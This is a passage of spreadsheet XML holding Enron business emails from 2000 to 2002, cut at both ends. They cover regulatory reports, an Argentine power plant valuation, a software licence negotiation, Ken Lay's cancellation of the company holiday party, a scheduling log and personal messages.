    <t>frozenset({'sarah.novosel@enron.com', 'daniel.allegretti@enron.com', 'elizabeth.linnell@enron.com', 'janine.migden@enron.com', 'mary.hain@enron.com', 'susan.mara@enron.com', 'james.steffes@enron.com', 'howard.fromer@enron.com', 'shelley.corman@enron.com', 'christi.nicolay@enron.com', 'kathleen.magruder@enron.com', 'steve.montovano@enron.com', 'robert.frank@enron.com', 'paul.kaufman@enron.com', 'richard.shapiro@enron.com', 'joe.hartsoe@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the latest weekly electric report_x000D_
_x000D_
 _x000D_
_x000D_
Also attached is the schedule for workshops for guidance in establishing _x000D_
RTOs. (Note:  Atlanta workshop has changed from April 5-6 to April 6-7)._x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 09:54:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mopre@yahoo.com'})</t>
  </si>
  <si>
    <t>RE: Are You Guys coming to LA?</t>
  </si>
  <si>
    <t>I'm not going to be able to make it.  I talked to Lisa and we're heading_x000D_
back to NJ for her friends wedding.  I'm hoping to make a trip to CA_x000D_
sometime next year.  I hope you have a great time and tell Lulenski I_x000D_
said hi._x000D_
_x000D_
Kevin_x000D_
_x000D_
-----Original Message-----_x000D_
From: Mike Opre [mailto:mopre@yahoo.com]_x000D_
Sent: Tuesday, October 23, 2001 4:45 PM_x000D_
To: Ruscitti, Kevin_x000D_
Subject: Are You Guys coming to LA?_x000D_
_x000D_
_x000D_
Kevin:_x000D_
_x000D_
Do you know if you're coming out yet? Got e-mails from_x000D_
Lulenski (he's coming) and Sarhatt (he's not). I'm_x000D_
planning to go to the beer bust and picnic for sure_x000D_
and probably the Saturday night event if enough of you_x000D_
guys are interested. Let me know._x000D_
_x000D_
Regards,_x000D_
_x000D_
Mike_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Make a great connection at Yahoo! Personals._x000D_
http://personals.yahoo.com</t>
  </si>
  <si>
    <t>Mon, 15 May 2000 09:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Technology Showcase Announcement</t>
  </si>
  <si>
    <t>Communication is one of Enron=01,s key values.   In our continuing effort t=_x000D_
o=20_x000D_
increase communication with our customers, Enron Net Works is hosting a=20_x000D_
Technology Showcase.  The purpose of this showcase is to keep you, our=20_x000D_
customer, aware of the tools available to you today as well as plans for th=_x000D_
e=20_x000D_
future.  Come see and hear about the future of=01(.  Laptops, Desktops,=20_x000D_
Operating Systems, Messaging, and much more._x000D_
_x000D_
Date: Friday, May 19, 2000_x000D_
Time: 10:00 - 2:00_x000D_
Place: Enron Plaza_x000D_
_x000D_
 Come join the fun and learn more about:_x000D_
_x000D_
Demonstrations_x000D_
? Hardware =01) Laptops, Desktops, Printers, Scanners, Handhelds_x000D_
? Windows 2000 =01) Hear about Project GEM (The Global Enron Migration to=_x000D_
=20_x000D_
Windows 2000) First look at new workstation operating system._x000D_
? Messaging =01) See the future of messaging including voice integration, f=_x000D_
axing=20_x000D_
ability, handheld integration, etc. =20_x000D_
? Web Site =01) Announcing the New Information Technology Web Site_x000D_
? Remote Connectivity =01) Get all your questions answered!_x000D_
? SRRS =01) See the future Security Recourse Request System in action!_x000D_
? Pagenet Pagers =01) Two way paging helps you stay in touch_x000D_
? Houston Cellular =01) Available choices_x000D_
_x000D_
Information Booths_x000D_
? Training =01) Information on available classes._x000D_
? Resolution Center =01) Come hear about the new name and mission of the He=_x000D_
lp=20_x000D_
Desk_x000D_
? Customer Care =01) New Unit focusing on your satisfaction.  Surveys, Feed=_x000D_
back,=20_x000D_
etc.=20_x000D_
_x000D_
Prizes (Must complete survey to be eligible for drawing.)_x000D_
? Autographed Houston Aeros Hockey Stick and Puck_x000D_
? Houston Astro Tickets_x000D_
? Laptop case with wheels_x000D_
? Shirts_x000D_
_x000D_
So, mark your calendars and don=01,t forget to stop by and see your Informa=_x000D_
tion=20_x000D_
Technology Team in Action!  We look forward to seeing you there!_x000D_
_x000D_
Susan Lopez_x000D_
Director, Customer Care_x000D_
713-853-7947</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 03:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">next week is good for me.  let 's just go get a drink after work or _x000D_
something.  who is your new roommate going to be? that sucks you have to _x000D_
waste a saturday moving.  </t>
  </si>
  <si>
    <t>Thu, 13 Jan 2000 07:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lynne.delaurentis@mbia.com'})</t>
  </si>
  <si>
    <t>Thank you--we will probably get back to Don sometime tomorrow._x000D_
_x000D_
-----Original Message-----_x000D_
From: Benjamin Rogers [mailto:brogers2@ect.enron.com]_x000D_
Sent: Wednesday, January 12, 2000 5:31 PM_x000D_
To: Lynne.delaurentis@mbia.com_x000D_
Subject:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Here is the latest presentation we have on the structure of our deal.  If_x000D_
you_x000D_
have any questions please call Don Black at (713) 853-4750. Thanks_x000D_
Ben_x000D_
_x000D_
(See attached file: Rating Agency pitch version 2.ppt)</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 16:18:43 -0800 (PST)</t>
  </si>
  <si>
    <t>UBS Presentation</t>
  </si>
  <si>
    <t xml:space="preserve">Please plan to attend the UBS Presentation Video Conference scheduled for Wednesday, 1/23/02 at 8:00 AM to 11:00 AM.  This meeting will be held in the Mt Hood and Mt Adams Conference Rooms.  _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'phyllis.anzalone@enron.com', 'jeff.dasovich@enron.com', 'mona.petrochko@enron.com', 'roger.yang@enron.com'})</t>
  </si>
  <si>
    <t>Restructuring Today, Tuesday November 14, 2000</t>
  </si>
  <si>
    <t>----- Forwarded by Susan J Mara/NA/Enron on 11/14/2000 12:20 PM -----_x000D_
_x000D_
	US Publishing &lt;daily@restructuringtoday.com&gt;_x000D_
	11/14/2000 09:10 AM_x000D_
	Please respond to daily_x000D_
		 _x000D_
		 To: "RT Reader" &lt;daily@restructuringtoday.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Restructuring Today, Tuesday November 14, 2000_x000D_
_x000D_
_x000D_
(see attached file:  rt001114.pdf)_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Season Hawksley_x000D_
US Publishing_x000D_
1-800-486-8201_x000D_
www.restructuringtoday.com_x000D_
season@restructuringtoday.com_x000D_
_x000D_
 - rt001114.pdf</t>
  </si>
  <si>
    <t>Tue, 18 Apr 2000 03:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EMPLOYER PPT TRAINING FOR STERLING BANK.ppt</t>
  </si>
  <si>
    <t xml:space="preserve">Twanda, please save this in whatever power point directory you have.  Then, _x000D_
print for me to revise for a presentation to Energy Operations for Norma.  _x000D_
Save this one, though, because the one I am going to use for Energy Ops will _x000D_
be much shorter, and this one has good stuff in it!  Thanks.  Michelle_x000D_
---------------------- Forwarded by Michelle Cash/HOU/ECT on 04/18/2000 10:21 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Notestine, Kerry" &lt;KNotestine@littler.com&gt; on 04/18/2000 07:49:43 AM_x000D_
To: "'mcash@enron.com'" &lt;mcash@enron.com&gt;_x000D_
cc:  _x000D_
Subject: EMPLOYER PPT TRAINING FOR STERLING BANK.ppt_x000D_
_x000D_
_x000D_
Michelle:_x000D_
_x000D_
The PowerPoint presentation that you requested.  Please delete any reference_x000D_
to Sterling Bank, but otherwise, this is my personal work product and you_x000D_
may use it.  Let me know if you need anything else on this topic._x000D_
_x000D_
In addition, I will let Anne Marie know the timing issue related to the_x000D_
checks._x000D_
_x000D_
Also, let me know what your hear from Jack.  We are disappointed that he did_x000D_
not come to our firm, but it does not surprise me._x000D_
_x000D_
Kerry E Notestine_x000D_
Littler Mendelson, PC_x000D_
1900 Chevron Tower_x000D_
1301 McKinney Street_x000D_
Houston, Texas 77010_x000D_
713.652.4748_x000D_
713.951.9212 (fax)_x000D_
knotestine@littler.com_x000D_
www.littler.com_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt;EMPLOYER PPT TRAINING FOR STERLING BANK.ppt&gt;&gt;_x000D_
_x000D_
----_x000D_
This email may contain confidential and privileged material for the sole use _x000D_
of the intended recipient(s). Any review, use, distribution or disclosure by _x000D_
others is strictly prohibited. If you are not the intended recipient (or _x000D_
authorized to receive for the recipient), please contact the sender by reply _x000D_
email and delete all copies of this message._x000D_
_x000D_
To reply to our email administrator directly, send an email to_x000D_
postmaster@littler.com_x000D_
_x000D_
Littler Mendelson, P.C._x000D_
http://www.littler.com_x000D_
_x000D_
_x000D_
_x000D_
 - EMPLOYER PPT TRAINING FOR STERLING BANK.ppt_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 May 2001 05:49:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'guerriero@enron.com'})</t>
  </si>
  <si>
    <t>Modesto Maranzana Terminal Value</t>
  </si>
  <si>
    <t xml:space="preserve">We are concluding the valuation and booking of the Modesto Maranzana transaction. The final point that needs to be agreed upon to properly book the transaction is the year 5 terminal value of the plant. _x000D_
_x000D_
The model currently represents a terminal value of $7.5 million based upon subjective rational. We have analysed the market and economic situation thoroughly and believe it is appropriate to accurately represent the terminal value as $12 million. The rational and economic analysis is covered in the below e mail. _x000D_
_x000D_
I would like to discuss this with you sometime today. I will call to see if we can set up a short discussion. Let me know if you would like Vlady to participate._x000D_
_x000D_
Based upon getting your concurence and the final review of the model with Joe we should be ready to book the transaction early next week._x000D_
_x000D_
MFG _x000D_
_x000D_
---------------------- Forwarded by Michael Guerriero/SA/Enron on 05/17/2001 10:33 AM ---------------------------_x000D_
_x000D_
_x000D_
Michael Guerriero_x000D_
05/08/2001 03:50 PM_x000D_
To:	Vladimir Gorny/Enron@EnronXGate_x000D_
cc:	Maria Ines Granado/SA/Enron@Enron, Mario Aguilar Benitez/SA/Enron@Enron _x000D_
_x000D_
Subject:	Modesto Maranzana Terminal Value_x000D_
_x000D_
We need to review the terminal value issue in the 5 year model. As we have discussed and John, I believe, agreed we do not believe salvage value is relevant in this short term time frame. I would also argue an arbitrary number such as $7.5 million is also not reflective of the true value in year five._x000D_
_x000D_
We have already received a verbal indication from Duke that they would have an interest in the facility at $9 - $11 million. Based upon Duke's minimal due diligence this is relevant in reconfirming our initial valuation and reflecting that there is demand for power generation assets in Argentina. _x000D_
_x000D_
In addition we believe the most accurate reflection of terminal value in year 5 is closer to our initial purchase price of $12 million. The below valuations, local market grid assessment, and our forward power curve support this conclusion._x000D_
_x000D_
1) Market Multiple of EBITDA Valuation:_x000D_
_x000D_
There are two "public" companies that are currently trading on the local stock exchange, the Merval. Central Puerto and Central Costanera. Both are thermal power units in Argentina._x000D_
_x000D_
On average the EBITDA multiple for these companies is equal to four (3.8 + 4.2))2 = 4_x000D_
_x000D_
Modesto Maranzana assumes an EBITDA of approximately $3 million.   MMPP EBITDA $ 3 MM x 4 = $ 12 MM_x000D_
_x000D_
This is again supportive of our valuation of $12 million_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
2) Most Recent Market Transaction Valuation:_x000D_
_x000D_
On Average the last 3 power acquisition transactions in the market were above $230 kW and the current market average is $213 kW. Based upon MMPP's installed capacity of 70 Mw and using the market average of $213 kW the plant could be valued as high as $14.9 million. This is again supports a conservative valuation of $12 million or $171 per kW. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
3) Rio Cuarto Grid Constraint Value Impact:_x000D_
There currently exist constraints in the Rio Cuarto Node that will make MMPP very strategic in terms of the short term avoided cost of a network expansion. In turn there will be a premium value associated with maintaining the plant in the Rio Cuarto area. This premium would logically come in two forms:_x000D_
_x000D_
	A.  The pending buyer of EPEC would enter into a commercial transaction with the plant to secure its position in the region. The format of the agreement would be a market based power contract with a premium demand charge or in the form of an obligatory agreement to maintain the plant in the area in recognition of a fixed annual fee._x000D_
_x000D_
	B. A related company of the company that buys EPEC in the pending privatisation would purchase the plant to secure its position in the region in recognition of the avoided cost associated with a grid expansion._x000D_
_x000D_
The avoided costs of the expansion projects are estimated to be between $4 and $16 million. _x000D_
_x000D_
  _x000D_
_x000D_
4) Forward Power Price Value Impact_x000D_
It is also relevant that Argentine power is contango and that in year 5 we will be in a more favourable scenario regarding forward power prices as noted below. This will support a stronger valuation at such time._x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
Loan Structure _x000D_
In addition I would like to solicit structuring the loan to be more reflective of cash flows in year 1. Under normal circumstances we try to structure a loan recognising the financial impact of the maintenance program. In light of this I request the loan be structured as interest only March 1, 2001 to December 31, 2001 and interest and principal there after._x000D_
_x000D_
_x000D_
Regards_x000D_
_x000D_
MFG_x000D_
</t>
  </si>
  <si>
    <t>Mon, 24 Jan 2000 05:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ees.group@enron.com'})</t>
  </si>
  <si>
    <t>2nd meeting and subgroups</t>
  </si>
  <si>
    <t xml:space="preserve">SK - I put it on your schedule as an FYI.  mm_x000D_
_x000D_
_x000D_
Our 2nd group meeting is scheduled for Tuesday, February 8, from 9:00 - 11:00 _x000D_
am Central Standard Time.  Each subgroup will discuss their progress._x000D_
See the attached file for subgroup tasks and membership.  Also below is the _x000D_
most up-to-date team roster._x000D_
_x000D_
Details for the Feb 8 meeting will be provided later.  Thank you!_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Sep 2000 11:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Toronto Meeting</t>
  </si>
  <si>
    <t>I agree.  I want to change the reporting to be directly to me anyway.  Let's _x000D_
discuss.  Mark</t>
  </si>
  <si>
    <t>Sat, 19 Feb 2000 17:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.holsworth@enron.com', 'vince.kaminski@enron.com'})</t>
  </si>
  <si>
    <t>RE: VMI Agreements</t>
  </si>
  <si>
    <t>Hi Vince, Mark Holsworth reviewed our contract on such a short notice.  I _x000D_
thank Mark for responding to our short-notice request.  It turns out that we _x000D_
need to get this database to move forward on a number of things and have _x000D_
legal save some time for us is an excellent help.  As mentioned below, It _x000D_
appears that PennWell's folks want to chat some more about this. _x000D_
_x000D_
Mark, can you schedule a conference call with these people to finalise this _x000D_
contract.  I will be out of town all week next week on a lock-down deal _x000D_
meeting. Vince may be able to get on the conference call.  I would greatly _x000D_
appreciate it if you could help us close this one!_x000D_
_x000D_
Regards,_x000D_
_x000D_
Ravi._x000D_
----- Forwarded by Ravi Thuraisingham/Enron Communications on 02/20/00 12:38 _x000D_
AM -----_x000D_
_x000D_
	Russell@pennwell.com_x000D_
	02/18/00 06:16 PM_x000D_
		 _x000D_
		 To: Ravi Thuraisingham/Enron Communications@Enron Communications_x000D_
		 cc: toni.turnerbudd@sbtglaw.com_x000D_
		 Subject: RE: VMI Agreements_x000D_
_x000D_
_x000D_
_x000D_
Ravi -_x000D_
_x000D_
I would like to schedule a conference call between you, me, PennWell's_x000D_
counsel (Toni Turner Budd), and Enron's counsel to discuss your changes and_x000D_
finalize the KMI End-User License Agreement.  I propose that we have the_x000D_
conference call at 2:00 PM CST this Monday, February 21.  Please let me know_x000D_
if you are available at this time and, if not, propose an alternative time_x000D_
for the call.  In addition, please provide me with a telephone number where_x000D_
I can reach you for the conference call._x000D_
_x000D_
PennWell is looking forward to finalizing the license agreement and_x000D_
delivering the KMI data to Enron._x000D_
_x000D_
Yours truly,_x000D_
_x000D_
Russell Iorio_x000D_
Manager of Business Development_x000D_
PennWell Corporation_x000D_
1421 South Sheridan Road_x000D_
Tulsa, OK  74112_x000D_
russell@pennwell.com &lt;mailto:russell@pennwell.com&gt;_x000D_
(918) 831-9122 Direct_x000D_
(918) 831-9476 Fax_x000D_
_x000D_
  -----Original Message-----_x000D_
  From: Ravi_Thuraisingham@enron.net_x000D_
[mailto:Ravi_Thuraisingham@enron.net]_x000D_
  Sent: Thursday, February 17, 2000 6:30 PM_x000D_
  To: RMack@kmicorp.com; mpass@kmicorp.com;_x000D_
russell@pennwell.com_x000D_
  Cc: Kristina_Lund@enron.net;_x000D_
Stinson_Gibner@ECT.enron.net; Vince_Kaminski@enron.net;_x000D_
Earl_Harvey@enron.net; Tracy_Williams@enron.net_x000D_
  Subject: VMI Agreements_x000D_
_x000D_
   &lt;&lt; File: Mac Word 3.0 &gt;&gt;_x000D_
_x000D_
     Hi Richard, here is a marked up version from our lawyer._x000D_
Please have your_x000D_
     people look at it and if it seems fine make the changes_x000D_
and send a signed_x000D_
     copy back to me._x000D_
_x000D_
     Ravi._x000D_
  ----- Forwarded by Ravi Thuraisingham/Enron Communications_x000D_
on 02/17/00 06:21 PM_x000D_
  -----_x000D_
  |--------+-----------------------&gt;_x000D_
  |        |          Mark         |_x000D_
  |        |          Holsworth@ENR|_x000D_
  |        |          ON           |_x000D_
  |        |                       |_x000D_
  |        |          02/17/00     |_x000D_
  |        |          04:10 PM     |_x000D_
  |        |                       |_x000D_
  |--------+-----------------------&gt;_x000D_
_x000D_
&gt;---------------------------------------------------------------------------_x000D_
-|_x000D_
    |_x000D_
|_x000D_
    |       To:     Ravi Thuraisingham/Enron_x000D_
Communications@Enron Communications,|_x000D_
    |       Gene Diers/Corp/Enron@ENRON_x000D_
|_x000D_
    |       cc:_x000D_
|_x000D_
    |       Subject:     VMI Agreements_x000D_
|_x000D_
_x000D_
&gt;---------------------------------------------------------------------------_x000D_
-|_x000D_
_x000D_
_x000D_
_x000D_
  Please find attached my redlining of the VMI Agreelment._x000D_
Please review it and_x000D_
  send it to the vendor for their review._x000D_
_x000D_
  (See attached file: 2-14-2000 EULA.doc)</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 04:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Delaney's Demand Plan</t>
  </si>
  <si>
    <t>Got your message.  Just as soon as we get out from under the deliverables Lay _x000D_
needs for Brulte, I'll turn to figuring how to get Delaney hooked up with _x000D_
decision makers that can make a difference in California.  Is next week too _x000D_
late for meetings?_x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Thu, 11 Jan 2001 02:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Gas Issues Paper</t>
  </si>
  <si>
    <t xml:space="preserve">Paul asked me to email this document to you.  It is the paper analyzing gas _x000D_
delivery issues into the NY, California and Chicago markets, and an _x000D_
attachment which summarized interstate transportation and penalty rules.  Let _x000D_
us know if you have any questions._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 15:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Associate/ Mid-Rotation Evaluation</t>
  </si>
  <si>
    <t xml:space="preserve">Our associates on the desk have asked why they have been included in the _x000D_
associate evaluation.  Are they in the corporate associate pool or are they _x000D_
simply designated associates on the trading floor?  No big deal - just _x000D_
forwarding their comments._x000D_
_x000D_
Mike_x000D_
---------------------- Forwarded by Mike Grigsby/HOU/ECT on 05/01/2001 09:56 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Monique Sanchez                           05/01/2001 03:28 PM_x000D_
	_x000D_
_x000D_
To: Mike Grigsby/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Associate/ Mid-Rotation Evaluation_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Monique Sanchez/HOU/ECT on 05/01/2001 _x000D_
03:27 PM ---------------------------_x000D_
From: Karen Davis/ENRON@enronXgate on 05/01/2001 02:56 PM_x000D_
To: Naveed Ahmed/NA/Enron@Enron, Kyle Berryman/ENRON@enronXgate, Timothy _x000D_
Blanchard/HOU/EES@EES, Amanda Day/HOU/EES@EES, Chris _x000D_
Figueroa/ENRON@enronXgate, Loftus Fitzwater/NA/Enron@Enron, Randall L _x000D_
Gay/HOU/ECT@ECT, Eduardo Gil/NA/Enron@ENRON, Selena Gonzalez/HOU/ECT@ECT, _x000D_
John B Gordon/HOU/EES@EES, Paul Gregory/ENRON@enronXgate, George _x000D_
Huan/ENRON@enronXgate, Felipe Jens/ENRON@enronXgate, John King/Enron _x000D_
Communications@Enron Communications, Jebong Lee/Enron Communications@Enron _x000D_
Communications, Kyu-Bong Lee/ENRON@enronXgate, David _x000D_
Loosley/ENRON@enronXgate, Reagan Mathews/Enron Communications@Enron _x000D_
Communications, Abhijeet Naik/ENRON@enronXgate, Stacey _x000D_
Neuweiler/ENRON@enronXgate, Juan Carlos Paysse/ENRON@enronXgate, Elizabeth _x000D_
Peters/Enron Communications@Enron Communications, Dutch Quigley/HOU/ECT@ECT, _x000D_
Jay Reitmeyer/HOU/ECT@ECT, Margaret Rhee/Enron Communications@Enron _x000D_
Communications, Reagan Rorschach/ENRON@enronXgate, Monique _x000D_
Sanchez/HOU/ECT@ECT, Michael Seely/Enron Communications@Enron Communications, _x000D_
Michael Sergeev/Enron Communications@Enron Communications, Nikhil Shah/Enron _x000D_
Communications@Enron Communications, Yuan Tian/NA/Enron@ENRON, Eboni _x000D_
Troupe/HOU/EES@EES, Miguel Vasquez/ENRON@enronXgate, V Charles _x000D_
Weldon/HOU/ECT@ECT, Bryan Williams/NA/Enron@Enron, Datren _x000D_
Williams/NA/Enron@Enron, Michelle Zhang/ENRON@enronXgate_x000D_
cc: Shelly Butler/ENRON@enronXgate _x000D_
Subject: Associate/ Mid-Rotation Evaluation_x000D_
_x000D_
As you approach the mid point in your current rotation, please take this _x000D_
opportunity to fill out an evaluation form on your experience thus far.  This _x000D_
form will enable the Program's Career Development department to monitor many _x000D_
things such as quality of work, business unit culture and knowledge gained _x000D_
within your rotation. _x000D_
_x000D_
You will be pleased to know that your input will be used to staff new summer _x000D_
and full time employees.  We will also be able to identify any potential _x000D_
areas of improvement within the business units.  The Career Development _x000D_
department will be able to provide valuable information and compare rotations _x000D_
amongst business units.  This information will be provided to Commercial _x000D_
Staffing Leads and other business unit leaders._x000D_
_x000D_
Remember, it is an opportunity to be heard.  Please complete the attached _x000D_
form and return to me via email or inter office mail.  If you would like this _x000D_
to be anonymous, please leave off your name but be sure to include your _x000D_
rotation information.  Thanks so much._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 13:34:59 -0800 (PST)</t>
  </si>
  <si>
    <t>Holiday Party - Canceled</t>
  </si>
  <si>
    <t>_x000D_
I know that this is a difficult time for all of us.  With everything going on inside the company as well as in the world around us, we have been carefully considering whether a holiday celebration is appropriate this year.  To be honest, employee feedback has been mixed.  Many viewed the holiday party as a unique opportunity for us to come together as Enron employees to share the spirit of the season.  Others felt a holiday party would be improper given the company's current circumstances._x000D_
_x000D_
After weighing these points of view, we have ultimately decided to cancel the all-Enron holiday party that was scheduled for December 8.  Given what has transpired over the past month, it could be considered imprudent for Enron to incur the expense of such an event.  I regret that this action is necessary because I recognize that your hard work throughout the year merits a holiday celebration and so much more.  We will attempt to find other, more appropriate ways to recognize your outstanding contributions as we move into the holiday season._x000D_
_x000D_
Ken Lay</t>
  </si>
  <si>
    <t>Sun, 29 Apr 2001 21:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/30/01; HourAhead hour: 5;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/30/01; HourAhead hour: 5;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001043005.txt_x000D_
Error: Invalid variant type conversion_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
*** Final schedule not found for preferred schedule._x000D_
     Details:_x000D_
_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTstCA_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/30/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_5001_x000D_
  ENGY_TYPE: FIRM_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 06:45:31 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'monte.jones@enron.com', 'c..giron@enron.com'})</t>
  </si>
  <si>
    <t>FW: AAADD</t>
  </si>
  <si>
    <t>Welcome to the life of running GD-NEW/WC-CAL._x000D_
 _x000D_
Have a good Holiday !_x000D_
 _x000D_
Anne_x000D_
 _x000D_
 _x000D_
-----Original Message-----_x000D_
From: Bike, Anne _x000D_
Sent: Wednesday, November 21, 2001 8:36 AM_x000D_
To: Delgado, Deborah_x000D_
Subject: FW: AAADD_x000D_
_x000D_
_x000D_
 _x000D_
-----Original Message-----_x000D_
From: Bike, Anne _x000D_
Sent: Wednesday, November 21, 2001 8:21 AM_x000D_
To: Agnes Reading (E-mail); Anne Moore (E-mail); Becky and Brent Bike (E-mail); Edward M. Griffin (E-mail); Gwen Dancy (E-mail); John Griffin (E-mail); Josie Jones (E-mail); Laura Attwell (E-mail); Sarah and JC Howell (E-mail); Suzie Loop (E-mail)_x000D_
Subject: FW: AAADD_x000D_
_x000D_
_x000D_
 _x000D_
-----Original Message-----_x000D_
From: Emilee Ryals [mailto:eryals@ev1.net]_x000D_
Sent: Tuesday, November 20, 2001 3:47 PM_x000D_
To: valenciagibson@bankunited.com; Rob Dammer; Bike, Anne; dhammond@stewart.com; felix.licefi@imperialsugar.com_x000D_
Subject: AAADD_x000D_
_x000D_
_x000D_
I have recently been diagnosed with AAADD - AgeActivated Attention Deficit_x000D_
&gt; Disorder. This is how it goes.....I decide to wash the car, start toward the_x000D_
&gt; garage and notice the mail on the table.OK, I'm going to wash the car...BUT_x000D_
&gt; FIRST I'm going to go through the mail. Lay car keys down on desk. After_x000D_
&gt; discarding the junk mail, I notice the trash can is full. OK, I'll just put_x000D_
&gt; the bills on my desk....BUT FIRST I'll take the trash out, but since I'm_x000D_
&gt; going to be near the mailbox, I'll address a few bills....Yes, Now where is_x000D_
&gt; the checkbook? Oops... there's only one check left. Where did I put the_x000D_
&gt; extra_x000D_
&gt; checks? Oh, there's my empty plastic cup from last night on my desk. I'm_x000D_
&gt; going to look for those checks...BUT FIRST I need to put the cup back in the_x000D_
&gt; kitchen. I head for the kitchen, look out the window, notice the flowers_x000D_
&gt; need_x000D_
&gt; a drink of water, I put the cup on the counter and there's my extra pair of_x000D_
&gt; glasses on the kitchen counter. What are they doing here? I'll just put them_x000D_
&gt; away...BUT FIRST need to water those plants. I head for the door and..._x000D_
&gt; Aaaagh! Someone left the TV remote in the wrong spot. Okay, I'll put the_x000D_
&gt; remote away and water the plants...BUT FIRST I need to find those checks.END_x000D_
&gt; OF DAY: car not washed, bills still unpaid, cup still in the sink, checkbook_x000D_
&gt; still has only one check left, lost my car keys; and, when I try to figure_x000D_
&gt; out why nothing got done today, I'm baffled because... I KNOW I WAS BUSY ALL_x000D_
&gt; DAY! I realize this condition is serious... I'd get help...BUT FIRST... I_x000D_
&gt; think I'll check my e-mail.  &gt;&gt;</t>
  </si>
  <si>
    <t>Tue, 3 Oct 2000 10:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: ENA offsite - speaker materials</t>
  </si>
  <si>
    <t>Only the 3 slides on power point.  Mark</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 07:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'apalmerlee@cfr.org'})</t>
  </si>
  <si>
    <t>frozenset({'communications@cfr.org'})</t>
  </si>
  <si>
    <t>CFR's January C&amp;C online now!</t>
  </si>
  <si>
    <t xml:space="preserve">Warm greetings on this cold December day!_x000D_
_x000D_
The January Calendar and Chronicle is now online. If you are keen to start_x000D_
planning your 2001 agenda, go to http://www.cfr.org/member and log in to sign _x000D_
up_x000D_
for meetings with the Joint Chiefs of Staff, Ehud Barak, Sandy Berger, Janet_x000D_
Reno, Tony Lake, and Wei Jingsheng, just to name a few._x000D_
_x000D_
If you would like to personalize the password / User ID we assigned you (or if_x000D_
you have forgotten what they are), just email webmaster@cfr.org._x000D_
_x000D_
Please email me back with any questions or comments you have about the site or_x000D_
the newsletter.._x000D_
_x000D_
You will receive a printed version of the C&amp;C in the snail mail next week._x000D_
_x000D_
All the best for 2001,_x000D_
_x000D_
April Palmerlee_x000D_
Director of Communications_x000D_
Council on Foreign Relations_x000D_
58 East 68th Street_x000D_
New York, NY  10021_x000D_
Tel 212-434-9544_x000D_
Fax 212-434-9832_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Aug 2001 07:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kevin.cline@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'seung-taek.oh@enron.com', 'doug.gilbert-smith@enron.com'})</t>
  </si>
  <si>
    <t>ERCOT Zonal Load Forecasts</t>
  </si>
  <si>
    <t>Starting tomorrow (8/15), I will start publishing a load forecast for the North, West, and South zones in ERCOT.  The zonal forecasts will be run at the same time that the total ERCOT load forecast is being run.  I want to communicate how the zonal forecasts are being generated and the limitations of the zonal forecasts._x000D_
_x000D_
